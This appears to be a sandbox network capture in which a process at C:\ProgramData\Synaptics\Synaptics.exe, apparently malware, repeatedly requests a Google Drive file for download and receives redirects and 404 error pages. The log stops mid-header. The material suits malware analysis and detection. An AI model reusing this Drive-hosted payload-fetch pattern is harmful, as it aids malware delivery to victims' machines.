Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.10	49949	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:39 UTC	345	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=p1ZG0eSUIZ2HeldZ96Efoo_bnHVsW-zXLAmFrVf8kmErECsxut1mh6CAz82zN5lXaMcdsexoy-1GSwmLPClPcQ79SenHcOUEty0lo5FQFasSgcavV29Cn8ptBMVVSQaYL3JdTX05T1-9Ea6IyZ_fRzKvi0oCMhe2YDbGRegqag2JIqD_QWiWyJvD
2024-12-30 10:25:40 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:39 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-G62O0uNvCgmjVOK9mwwQxA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.10	49950	142.250.184.225	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:39 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
2024-12-30 10:25:40 UTC	1243	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC7ZB0jaLdiyFp8WTHOSWhA3_ncdd9MyI2WXWwfoqrOr6IYvEsbxgihfbPyvgE-4Asnn Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:40 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'report-sample' 'nonce-QQKWj13H8gQrbzFc2pgXbg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:25:40 UTC	147	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:25:40 UTC	1390	IN	Data Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 53 5a 70 69 42 41 4d 6a 62 50 58 70 31 74 43 5f 6c 6c 6e 58 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 Data Ascii: t Found)!!1</title><style nonce="7SZpiBAMjbPXp1tC_llnXg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:25:40 UTC	115	IN	Data Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.10	49951	142.250.184.225	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:39 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
2024-12-30 10:25:40 UTC	1243	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC5ib9-MvF4oztS4pL0EXH7hi8o2_8x4cV7u6pm2Y_mV8UAViIxSgzImrv7BQDgOBrRK Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:40 GMT Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-a1Jio3vM31uD0fKAhFkLTg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:25:40 UTC	147	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:25:40 UTC	1390	IN	Data Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 77 65 51 61 5f 63 5a 59 58 66 4c 66 64 50 44 63 32 6e 47 57 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 Data Ascii: t Found)!!1</title><style nonce="fweQa_cZYXfLfdPDc2nGWw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:25:40 UTC	115	IN	Data Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.10	49961	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:40 UTC	345	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=p1ZG0eSUIZ2HeldZ96Efoo_bnHVsW-zXLAmFrVf8kmErECsxut1mh6CAz82zN5lXaMcdsexoy-1GSwmLPClPcQ79SenHcOUEty0lo5FQFasSgcavV29Cn8ptBMVVSQaYL3JdTX05T1-9Ea6IyZ_fRzKvi0oCMhe2YDbGRegqag2JIqD_QWiWyJvD
2024-12-30 10:25:41 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:41 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-jqlkw96VIpEpD9EmJQHRug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.10	49960	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:40 UTC	345	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=p1ZG0eSUIZ2HeldZ96Efoo_bnHVsW-zXLAmFrVf8kmErECsxut1mh6CAz82zN5lXaMcdsexoy-1GSwmLPClPcQ79SenHcOUEty0lo5FQFasSgcavV29Cn8ptBMVVSQaYL3JdTX05T1-9Ea6IyZ_fRzKvi0oCMhe2YDbGRegqag2JIqD_QWiWyJvD
2024-12-30 10:25:41 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:41 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'report-sample' 'nonce-OVDbhg6CS6X5JP_C53CP-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.10	49962	142.250.184.225	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:40 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
2024-12-30 10:25:41 UTC	1243	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC7QGjL2bE-Wml6dmM8VXksBJnHqDTpfsTri2bkgX7H7HenJFvuG0cupQC4SHCP1iz4C Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:41 GMT Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-ldu3Z6Suo--WkLZuKAtkPw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:25:41 UTC	147	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:25:41 UTC	1390	IN	Data Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2d 57 35 77 77 55 39 63 4f 64 77 35 70 63 55 50 6d 46 34 77 32 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 Data Ascii: t Found)!!1</title><style nonce="-W5wwU9cOdw5pcUPmF4w2g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:25:41 UTC	115	IN	Data Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.10	49966	142.250.184.225	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:40 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
2024-12-30 10:25:41 UTC	1243	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC73ROYEnfOsssoCeaIX7NllHnpgbWsUtvv6zvQbLite4VUsWhzoy4gYke3EoHTqX9lr Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:41 GMT Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-9XuZB6RnSwjANqvSscnXHg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:25:41 UTC	147	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:25:41 UTC	1390	IN	Data Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 30 5f 41 58 5f 31 54 53 53 61 4b 38 30 49 32 39 73 6d 4b 62 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 Data Ascii: t Found)!!1</title><style nonce="j0_AX_1TSSaK80I29smKbQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:25:41 UTC	115	IN	Data Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.10	49984	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:42 UTC	345	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=p1ZG0eSUIZ2HeldZ96Efoo_bnHVsW-zXLAmFrVf8kmErECsxut1mh6CAz82zN5lXaMcdsexoy-1GSwmLPClPcQ79SenHcOUEty0lo5FQFasSgcavV29Cn8ptBMVVSQaYL3JdTX05T1-9Ea6IyZ_fRzKvi0oCMhe2YDbGRegqag2JIqD_QWiWyJvD
2024-12-30 10:25:42 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:42 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 